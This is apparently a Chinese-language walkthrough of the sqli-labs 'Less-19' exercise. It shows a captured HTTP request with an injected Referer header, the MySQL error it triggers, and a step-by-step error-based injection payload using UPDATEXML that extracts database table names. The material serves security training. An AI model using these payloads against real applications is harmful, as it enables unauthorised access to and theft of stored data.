Less19

Less-19

1. 有了18题目的经验，这道题就比较简单
2. 直接bp抓包发送

POST /Less-19/ HTTP/1.1
Host: sql.alienwares.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://sql.alienwares.top
Connection: close
Referer: asa'ddd#
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

 

You have an error in your SQL syntax;...version for the right syntax to use near 'ddd#', '117.188.186.53')' at line 1

• 返回mysql报错的结果
• mysql 语句应该为 

insert into table_name values ('a','b'）

• 开始sql注入语句构造

sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE() 
concat(0x7e,sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())
#记得加（
select updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1)
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or 1=1,'127.0.0.1')#', '$IP')

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#', '$IP')
'or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#

 

 

sql注入大功告成